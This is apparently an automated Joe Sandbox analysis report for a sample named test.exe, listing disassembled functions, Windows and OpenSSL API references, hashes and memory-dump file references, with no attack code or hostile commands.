Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: getaddrinfo
String ID: ..\s\crypto\bio\b_addr.c
API String ID: 300660673-2547254400
Opcode ID: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
Instruction ID: 722216ce105fcd2af3090c1da1ee4e229c497024b006cc40992dadef001b22aa
Opcode Fuzzy Hash: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
Instruction Fuzzy Hash: 8741B873B1868A87EB589F16B4906BDB7A1FB94784F004135EB8A43B85DF3CE445BB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE3387 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FFD3FCAA1A7
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA1B2

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFD3FCAA166, 00007FFD3FCAA1C8, 00007FFD3FCAA1E4, 00007FFD3FCAA217

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastgetsockname
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 566540725-540685895
Opcode ID: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
Instruction ID: 3bfb88c5979ec1666a3f0783bc7d2ac897cf31a6502ec2b58e5a217044956d6f
Opcode Fuzzy Hash: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
Instruction Fuzzy Hash: 232190B6B0814AD6E725DB20E8656ED7360FF80304F840231E76C43A95DF3DE589EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE6BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFD3FCAA362
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA36E

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFD3FCAA384

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 1021210092-540685895
Opcode ID: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
Instruction ID: 581d40725691655526b4c6309f48319c5746a3baf1354b6beb656b4e82ebd8fc
Opcode Fuzzy Hash: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
Instruction Fuzzy Hash: 92E0D895B0954B87F71A5B60E874B7D1310AF84304F000134EF1DC2691DF3DF149A601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FE1B190 Relevance: 5.2, APIs: 4, Instructions: 239COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B2CB
memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B313
memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B32D

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
Instruction ID: 5dcb10c62d986749a5643e8c892569aefbdb855d31880017d62f8cbbf9d2875b
Opcode Fuzzy Hash: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
Instruction Fuzzy Hash: FB910861B0868982EB189B17D4A017DA7A0FBC9FC4F588035DF8D93B96CE3EE855D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE53E4 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FCD9950
memmove.VCRUNTIME140 ref: 00007FFD3FCD9960
memmove.VCRUNTIME140 ref: 00007FFD3FCD9970
memmove.VCRUNTIME140 ref: 00007FFD3FCD9980

Memory Dump Source

Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
Instruction ID: 7806a3e2b7fff18afe6bea40b5bd3edb473fd01d1bbea04dea83d53fcd418057
Opcode Fuzzy Hash: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
Instruction Fuzzy Hash: 4A11BF62B04A8592D714EB1AE1901EDA360FF847D0F448132FB9E87B96EF28E5E1D300

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: test.exePID: 6884, Parent PID: 6860COMMON

Executed Functions

Function 004010ED Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				intOrPtr _v12;
				intOrPtr* _t6;
				void* _t9;

				_v12 = 0xff;
				_t6 =  *0x5db620; // 0x5f6ea0
				 *_t6 = 1; // executed
				_v12 = L0040114B(_t9);
				return _v12;
			}

0x004010f5
0x004010fc
0x00401103
0x0040110e
0x0040111b

Memory Dump Source

Source File: 00000002.00000002.219096560.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.219089830.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219148606.00000000005C2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219157156.00000000005D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219165085.00000000005DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219173616.00000000005EC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219173616.00000000005F8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219188210.00000000005FA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_test.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0627318d90cec2deb4beba49524667c5b684d189ba6ba86565943c584361f479
Instruction ID: ef569db1cc39ee6c2fbb2dfec9dda639ce9a648156eaba70ce610853e08ca3f6
Opcode Fuzzy Hash: 0627318d90cec2deb4beba49524667c5b684d189ba6ba86565943c584361f479
Instruction Fuzzy Hash: 1DC02238200A08CEF300BF22CC023A833B0A308F08F80002ACE080F3A2CBBCC0028F08

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD3FBE3229 Relevance: 21.3, APIs: 14, Instructions: 251fileCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD83F3E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD3FD83F8E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD83F9C
memset.VCRUNTIME140 ref: 00007FFD3FD83FB8
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD83FDF
GetLastError.KERNEL32 ref: 00007FFD3FD83FEC
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD84013
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FD84068
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFD3FD84079
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD84082
FindFirstFileW.KERNEL32 ref: 00007FFD3FD841EC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFD3FD8420E
FindNextFileW.KERNEL32 ref: 00007FFD3FD84229
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FD84287

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFind$ErrorFirstLastNextfreemallocmemset
String ID:
API String ID: 3372420414-0
Opcode ID: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
Instruction ID: dc931f34dada93bae943df16885b375699c41fa0d4b9d81008c95cc65b2e24da
Opcode Fuzzy Hash: 5c753f6ee10f5d401d3a973a1d8301d71a9dd3c075b512ff88a6f757cec8f98e
Instruction Fuzzy Hash: FBB11562B08A8685EB188F25E8686797BA0FF59BA4F484731DB6D037D0EF3DE0459340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE266C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC61
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC82
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADC9D
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADCB8
GetEnvironmentVariableW.KERNEL32 ref: 00007FFD3FDADD00
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FDADD36
WideCharToMultiByte.KERNEL32 ref: 00007FFD3FDADD8B

Strings

RANDFILE, xrefs: 00007FFD3FDADC49
USERPROFILE, xrefs: 00007FFD3FDADC8E
HOME, xrefs: 00007FFD3FDADC70
.rnd, xrefs: 00007FFD3FDADE3A
SYSTEMROOT, xrefs: 00007FFD3FDADCA9

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: EnvironmentVariable$ByteCharMultiWide
String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
API String ID: 2184640988-1666712896
Opcode ID: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
Instruction ID: f3b2b23f387a46e4829f6c578e815338dd02b7ff32691be0f381d938ecf791b3
Opcode Fuzzy Hash: 94a3f27f441c069f02bf03fdac3435e2be26af5a1126ddad85516de43e4ab70a
Instruction Fuzzy Hash: F761E322B08B8695EB58CF21A46017967A1FB59BE4B488331DF6D437D8DF3EE105E300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE5A1F Relevance: 13.6, APIs: 9, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFD3FE25BD0
memset.VCRUNTIME140 ref: 00007FFD3FE25BF4
RtlCaptureContext.KERNEL32 ref: 00007FFD3FE25BFD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD3FE25C17
RtlVirtualUnwind.KERNEL32 ref: 00007FFD3FE25C58
memset.VCRUNTIME140 ref: 00007FFD3FE25C8B
IsDebuggerPresent.KERNEL32 ref: 00007FFD3FE25CAC
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD3FE25CCD
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD3FE25CD8

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
Instruction ID: 65425b828e2fc1675746f37939820d40e660f106bd68d24aa44ab5b4e75d7187
Opcode Fuzzy Hash: ce35e6337236f3c81091592d9187cbdc35141420fbd4c5511d86306e2d3c8c38
Instruction Fuzzy Hash: B0315CB6709B859AEB649F60E8503ED3360FB84788F44413ADB8E57B98EF38D548D710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE22E8 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFD3FD837AB
memset.VCRUNTIME140 ref: 00007FFD3FD837C2
memmove.VCRUNTIME140 ref: 00007FFD3FD837E9
memset.VCRUNTIME140 ref: 00007FFD3FD837F6
memmove.VCRUNTIME140 ref: 00007FFD3FD8382A

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
